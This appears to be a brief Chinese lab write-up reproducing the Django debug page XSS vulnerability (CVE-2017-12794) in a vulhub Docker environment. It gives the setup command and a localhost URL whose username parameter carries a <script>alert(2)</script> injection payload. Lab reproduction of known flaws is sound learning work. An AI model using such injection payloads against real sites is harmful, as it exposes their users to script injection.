复现环境:vulhub
1.开启该环境
命令:docker-compose up -d
2.访问网址:127.0.0.1:8000/create_user/?username=<script>alert(2)</script>
显示成功创建一个用户
3.再次访问该网址:127.0.0.1:8000/create_user/?username=<script>alert(2)</script>
弹出XSS弹窗。
Django debug page XSS漏洞(CVE-2017-12794)
最新推荐文章于 2024-03-20 00:22:19 发布